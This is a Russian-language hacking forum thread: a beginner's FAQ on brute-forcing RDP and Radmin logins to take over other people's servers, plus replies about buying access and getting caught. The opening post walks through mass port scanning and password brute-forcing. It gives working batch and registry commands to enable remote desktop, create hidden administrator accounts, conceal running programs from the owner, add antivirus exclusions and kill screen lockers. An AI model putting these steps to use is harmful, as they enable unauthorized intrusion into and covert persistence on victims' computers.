Авторские статьи Большой F.A.Q. по брруту дедиков

Обсуждение в разделе «Статьи», начал(-а) diki_01, 20.01.2013.

  1. diki_01

    diki_01 New Member

    Регистрация:
    18.01.2013
    Сообщения:
    18
    Одобрения:
    4
    Репутация:
    0
    Большой F.A.Q. по бруту дедиков

    В этой статье я постараюсь более мение полностью описать весь процес брута дедиков и работу на дедике.
    И так приступим:
    1.Что такое дедик?
    Дедик - пошло от английского слова "dedicated", что с англиского значит выделенный. То есть Dedicated Server - выделенный сервер. Дедики, как их принято называть, на которых имеются довольно мощные сетевые интерфейсы, каналы и довольно не слабая аппаратная конфигурация
    служат для обработки данных, а также для хранения баз данных или любого другого материала находящегося на них для обслуживания персонала, фирмы или организации.

    2.Для чего предназначены дедики?
    Дедики можно использовать для абосолютно разных целей например для интернет серфинга, для брута, спама, можно ставить на нем игровые сервера (например я много раз находил на дедиках сервера кс) и т.д.

    3.Где достать дедик?
    Дедик можно купить, сбрутить или добыть с помощю трояна.

    4.Брут дедиков

    -Брут RDP
    RDP - протокол удалённого рабочего стола.
    Для брута RDP нам понадобитса следующие программы DuBrute RC2(сам брут)VT, vnc_scanner_GUI VT(сканер портов) и можно еще ipgeobase VT(база данных IP адресов). Программы не обязательно эти, можно и другие, но лично я пользуюсь етими.
    И так приступим.
    1.Запустите ipgeobase выберите округ, регин или город, скопируйте все ип адреса в буфер.
    2.Теперь запустите vnc_scanner_GUI и вставте в самое большое поле все ип адреса.
    И настроим его так:
    [​IMG]
    Теперь нажимаем Start Scan и ждем окончания работы.
    По окончании работы нажимаем Start Parser, теперь в файле IPs.txt сохранятса все ип адреса с открытым 3389 портом.
    3.Запускаем DuBrute RC2 и нажимаем Generation.
    Теперь нажимаем File IP и выбираем наш IPs.txt
    Нажимаем File Login и выбираем файл с логинами(можно добавить свои) обычно Login.txt
    Нажимаем File Pass и выбираем файл с паролями (тоже можете добавить свои) обычно Pass.txt
    Нажимаем Make и можем закрывать это окно.
    Теперь в папке с брутом в файле source.txt записаны все комбинации ип адресов, логинов и паролей.
    Нажимаем Config и Настроим его так:
    [​IMG]
    Нажимаем OK и все настройка брута закончена, нажимаем старт и ждем окончания работы.
    После окончание работы все гуды сохранятса в файле good.txt
    Вот и все на етом брут RDP закончен.

    -Брут Radmin
    1. Сам процес брута

    Radmin - программа для удалённого доступа.
    Для ее брута нам понадобитса lamescan3_r11 VT, ipgeobase VT и клент радмина radmin viewer VT
    1.Приступим, сначала запускаем lamescan3_r11 и нажимаем Настройка->основное
    Настроим его так:
    [​IMG]
    закрываем окно и нажимаем Настройка->Интерфейс там укажите путь к радмину, и поставте все галочки.
    Вот так:
    [​IMG]
    2.Запустите ipgeobase выберите округ, регин или город, скопируйте все ип адреса, в lamescan нажмите Диапазоны->Добавить в очередь->Список диапазонов, вставляем туда ип адреса и нажимаем Готово.
    Теперь включаем сканирование(зеленый треугольник) и ждем окончание работы.
    После окончания работы можете спокойно подлючатса к хосам к которым подобран пароль.
    Вот и все на етом брут Radminа закончен.

    2.Что делать дальше?

    После того как вы сбрутили несколько радминов нам понадобитса сделать с них дедик т.е. включить RDP(удалённый рабочий стол), и пропатчить систему на мультиюзерность(чтобы вы и админ не мешали друг другу).
    Приступим, включить RDP можно так:
    -Щелкаем Правой кнопкой мышки на Мой компютер->Свойства
    -Переходим на вкладку "Удалённые сеансы"
    -Ставим везде галочки
    или с помощю батника:

    @Echo off
    netsh firewall set service remoteadmin enable
    netsh firewall set service remotedesktop enable
    reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

    Чтобы запустить батник на компютере у жертвы надо с помощю передачи файлов закинуть батник в недры виндовса и подключитса к командной строке, командой "cd Имя каталога" перейти в папку в которую положили батник и ввести в ней имя батника например batnik.bat
    Чтобы включить мультиюзерность надо пропатчить систему следующим патчем TS_Free VT и перезагрузить компютер, запустить его можно также с использованием командной строки.
    Вот и все теперь можете подключитса к компютеру по RDP, но пользователя у вас пока не будет, как его создать читайте далее.


    5.Как создать и скрыть пользователя на дедике?

    Не буду розказывать о всех способах создание пользователя т.к. ето замет много времени, розкажу о основных.
    1.С помощю Управление компютером
    -Щелкаем Правой кнопкой мышки на Мой компютер->Управление
    -Локальные пользователи и группы->Пользователи->Правая кнопка мыши Новый пользователь и вводим имя, пароль и тд.(Галочку поставте только на 3 пункте)
    2.С помощю cmd
    Включаем cmd и создаем пользователя командами:
    net user Имя Пароль/add
    net localgroup Група администраторов Имя /add
    net localgroup Група пользователей RDP Имя /add
    net accounts /maxpwage:unlimited
    3.С помощю батника который создает и сразу скрывает пользователя с екрана приветствий
    Set AdmGroupSID=S-1-5-32-544
    Set AdmGroup=
    For /F "UseBackQ Tokens=1* Delims==" %%I In (`WMIC Group Where "SID = '%AdmGroupSID%'" Get Name /Value ^| Find "="`) Do Set AdmGroup=%%J
    Set AdmGroup=%AdmGroup:~0,-1%
    net user Имя_пользователя Пароль /add
    net localgroup %AdmGroup% Имя_пользователя /add
    Set RDPGroupSID=S-1-5-32-555
    Set RDPGroup=
    For /F "UseBackQ Tokens=1* Delims==" %%I In (`WMIC Group Where "SID = '%RDPGroupSID%'" Get Name /Value ^| Find "="`) Do Set RDPGroup=%%J
    Set RDPGroup=%RDPGroup:~0,-1%
    net localgroup "%RDPGroup%" Имя_пользователя /add
    net accounts /maxpwage:unlimited
    reg add HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
    reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v Имя_пользователя /t REG_DWORD /d "00000000" /f

    4.С помошю программы DED C14 vt она создаст и скроет пользователя.

    5.Скрыть пользователя.
    Вот мы создали пользователя теперь надо скрыть его с екрана приветствия при запуске виндовс и в папке Documents and Settings, на скрытьии в папке останавлеватса не буду надеюсь все это знают.
    Чтобы скрыть пользователя в екране приветствия в ветке реестра
    HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
    нужно создать параметер типа DWORD с именем пользователя и значением 0.
    Вот и все тепер на дедике у нас есть свой скрытый пользователь.

    6.Как пользоватса дедиком не создавая пользователя(под админом) и не быть замеченым?

    Для того чтобы использовать дедик не создавая пользователя (на пользователе админа) нам нужны следующие программы hidetoolz VT, PS Tray Factory VT, DelTrayIcon VT.
    Начнем запускаем свои программы (с которыми вы собираетесь работать на дедике), все там запускаете, и теперь начнем их прятать:
    - Запускаем PS Tray Factory и в первых двух вкаладках отмечаем приложения которые хотим скрыть и сворачеваим эго(не выключаем). Посе етого действия пропадут окна нашых програм, но останетсу процесы иконка PS Tray Factory.
    - Запускаем DelTrayIcon и удаляем иконку PS Tray Factory и выключаем его. Мы удалили иконку PS Tray Factory осталось скрыть процесы PS Tray Factory и програм которые мы хотели скрыть.
    - Запускаем hidetoolz и на процесах которые создали наши приложения нажимаем правую кнопку мыши->HIDE и выключаем его.
    Если вы все сделали правильно то теперь наши программы работают на учетке админа полностю скрыто и он об етом даже не подозревает.
    Тепер чтобы увидеть окна вашых програм включите hidetoolz и зделайте все процесы видимыми, убейте в деспетчере задач процес PS Tray Factory, система немного залагает и покажет вам окна всех програм которые вы скрыли.

    7.Что делать если антивирус на дедике удаляет ваши программы?
    Обяснять для каждого антивируса очень долго но розкажу в общем виде(если что поищите в гугле).
    Нужно создать папку гдето в недрах виндовс, добавить в настройках антивируса нашу папку в исключения и скачать в нее все программы.
    Если антивирь не разрешает изменений и просит пароль можем попытатса выключить его, или в крайнем случае поискать в текстовых документах админа пароль к ав. Удалять его не стоит так как админ сразу спалит вас и выгонит со своего компа.
    8.Что делать если на дедике ScreenLocker?

    Как обойти новые локеры я чесно говоря не знаю, но можно попытатса вызвать диспетчера задач комбинацией клавиш [Ctrl]+[Shift]+[Esc] и убить процес локера, или вызвать командную строку с помощю [Win]+[R] ввести cmd и в ней командами tasklist и taskkill убить процес локера, можно попытатса переключитса на другое окно с помощю [Alt]+[Tab] или если есть доступ до файлов с помощю техже команд что написал выше убить процес батником.

    9.Как зайти на дедик?
    Для того чтобы зайти на дедик нажимаем Пуск->Выполнить... у вас откроетса окно "Запуск программы" в нем пишем mstsc и нажимаем OK,
    откроетса окно "Подключение к удаленному рабочему столу" в поле "Компьютер:" пишем ип адрес дедика, для более удобного доступа нажимаем кнопку "Параметры"
    и в поле "Пользователь" пишем имя учетки, ставим галочку на "Разрешить мне сохранять учетные данные" и нажимаем Подключить,
    появитса еще одно окно в нем пишем пароль и ставим галочку внизу, на нажимаем ОК и все вы на дедике, чтобы зайти на него еще раз вам просто будет нужно
    выбрать ип дедика и нажать Подключить и ваш компютер автоматически введет логин и пароль к пользователю.
    Когда вы ето все проделали в Параметры->Параметры подключение можно нажать сохранить как и сохранить файл с расширение .rdp потом надо будет только запустить файл и вы сразу окажетесь на дедике.

    10.Как подключить свой локальный диск и буфер обмена к дедику?

    Для того чтобы подключить к дедику свой локальный диск и буфер обмена в окне "Подключение к удаленному рабочему столу" нажимаем "Параметры" выбираем вкладку "Лкальные ресурсы" внизу ставим галочку на "Буфер обмена" и нажимаем "Подробнее" в открывшемся меню выбираем какое устройство вы хотите подключить и ставим галочку возле него(если подключить диск на котором установлена ваша ОС (Обычто диск C ) то можно будет ппередавать файлы через буфер обмена), нажимаем ОК и все готово, теперь вы можете намного легче и быстрее передать необходимые файлы на дедик, только не увлекайтесь етим потомучто ваш локальный диск будет доступен всем пользователям дедика т.е. админ увиди что подключилса ваш диск, потому надо быстро передать файлы, выйти из дедика, отключить диск и пользоватса дедиком далше.

    11.Автоматически запустить свою прогу при входе на дедик

    Вы можете запустить свою програму при подключении (обычно программы для сбора информации) для етого в окне "Подключение к удаленному рабочему столу" нажимаем "Параметры" выбираем вкладку "Программы", ставим галочку и в поле путь к программе и имя файла пишем "tsclient\\буква диска\путь к файлу" и нажимаем подключить.

    Базы данных ип адресов стран можно найти на сайте www.proxysecurity.com
    Вот и все на етом моя статья закончена если будут еще какието вопросы или идеи что добавить в статью говорите.
    Прошу сильно не ругать это моя первая статья.
     
    #1 diki_01, 20.01.2013
    В последний раз редактировалось: 19.07.2013
    Это одобряют 4 пользоветелей.
  2. Killan

    Killan Member

    Регистрация:
    18.11.2011
    Сообщения:
    42
    Одобрения:
    4
    Репутация:
    0
    Много конечно тем касаемо дедов, но более полной и понятной не попадалось. Мне нравится)
     
  3. diki_01

    diki_01 New Member

    Регистрация:
    18.01.2013
    Сообщения:
    18
    Одобрения:
    4
    Репутация:
    0
    спасибо, можете подсказать как сделать спойлер на етом сайте?
     
  4. vip@

    vip@ New Member

    Регистрация:
    15.11.2011
    Сообщения:
    8
    Одобрения:
    0
    Репутация:
    0
    Можешь патч на мультиюзерность перезалить? Там файл удалён, а искать другие - не все работают на win 7
     
  5. anti4it

    anti4it New Member

    Регистрация:
    25.05.2010
    Сообщения:
    113
    Одобрения:
    5
    Репутация:
    0
    Подскажите как должен выглядеть, source.txt ? Что-то брут ничего не брутит
     
  6. anti4it

    anti4it New Member

    Регистрация:
    25.05.2010
    Сообщения:
    113
    Одобрения:
    5
    Репутация:
    0
    Стукни в аську 690-889 готов приобретать дедики в для собственных нужд за небольшую плату
     
  7. dlavager

    dlavager Member

    Регистрация:
    1.02.2013
    Сообщения:
    98
    Одобрения:
    6
    Репутация:
    0
    причем тут только Радмин мне не понятно,если написал что по Дедикам?
    Не чего нового нет,такого везде масса,это для новичков может ,не более того
     
  8. anti4it

    anti4it New Member

    Регистрация:
    25.05.2010
    Сообщения:
    113
    Одобрения:
    5
    Репутация:
    0
    радмины брутятся замечательно, а вот с дедиками беда
     
  9. dlavager

    dlavager Member

    Регистрация:
    1.02.2013
    Сообщения:
    98
    Одобрения:
    6
    Репутация:
    0
    Не какой беды нет.просто нужны пасс,нормальные и канал с железом.ну и клиенты
     
  10. anti4it

    anti4it New Member

    Регистрация:
    25.05.2010
    Сообщения:
    113
    Одобрения:
    5
    Репутация:
    0
    подскажи, плиз какой все-таки должен быть source.txt ?))
     
  11. dlavager

    dlavager Member

    Регистрация:
    1.02.2013
    Сообщения:
    98
    Одобрения:
    6
    Репутация:
    0
    Это все есть в паблике.
    Нет я за это беру оплату.Просто так не чего не рассказываю.
    Сам обучался платно. Тогда такого не было,как сейчас
     
  12. VKAPI

    VKAPI Member

    Регистрация:
    25.11.2011
    Сообщения:
    35
    Одобрения:
    6
    Репутация:
    5
    Лучше рассказали бы " Что бывает при бруте дедиков"

    что будет если брутить с своей машины без маски
     
  13. Atomikdddsss

    Atomikdddsss Banned

    Регистрация:
    8.12.2011
    Сообщения:
    234
    Одобрения:
    13
    Репутация:
    7
    У знакомых было вот так:Чувак брутил со своего пк Германию вроде,через пару дней из одного универа Германии пришло письмо провайдеру о прожественных попытках входа (вообщем сказали что атакуют) после чего провайдер отрубил инет пользователю и пригрозил
    чуваку что если будет ещё такими делами заниматься то получит по попе и т.п.
    Было ещё такое: Чувак с деда брутил РУ и через 3 дня к нему приехали гости,анально наказали и выписали штраф.Но есть знакомы которые уже пару лет Ру брутят и хоть бы хны.
     
  14. VKAPI

    VKAPI Member

    Регистрация:
    25.11.2011
    Сообщения:
    35
    Одобрения:
    6
    Репутация:
    5

    ну и я думаю) год назад Чекал 3млн мыл. где то 10 дней безпередышки с своего компа и пофег) но сам шугался чуток)
     
  15. seledkapod

    seledkapod New Member

    Регистрация:
    12.08.2009
    Сообщения:
    3
    Одобрения:
    1
    Репутация:
    0
    Аффтар обнови ссылки! Пашут только первые три ссылки, по остальным все удалено!
     
  16. diki_01

    diki_01 New Member

    Регистрация:
    18.01.2013
    Сообщения:
    18
    Одобрения:
    4
    Репутация:
    0
    немного обновил
     
  17. Owned777

    Owned777 New Member

    Регистрация:
    19.08.2012
    Сообщения:
    16
    Одобрения:
    0
    Репутация:
    0
    подскажите где можно взять диапазон Ip?
     
  18. ZEPHYR

    ZEPHYR New Member

    Регистрация:
    31.05.2013
    Сообщения:
    212
    Одобрения:
    6
    Репутация:
    3
    Блин, ну какое удовольствие все это делать под Окнами?
    Диапазоны тут
     
    #18 ZEPHYR, 15.09.2013
    В последний раз редактировалось: 15.09.2013
  19. dlavager

    dlavager Member

    Регистрация:
    1.02.2013
    Сообщения:
    98
    Одобрения:
    6
    Репутация:
    0
    такой умный одни мы тут все тупые.
    спасибо что подсказал а то не кто не знал.
    тебе ещё таких 10 ток дать сайтов умник.
     
  20. HavingingWor

    HavingingWor New Member

    Регистрация:
    11.01.2012
    Сообщения:
    24
    Одобрения:
    0
    Репутация:
    0
    Почему на ламескане доходит подбор, при стандартных логинах и пасах, до 61% ничего дальше, как исправить?
     
Loading...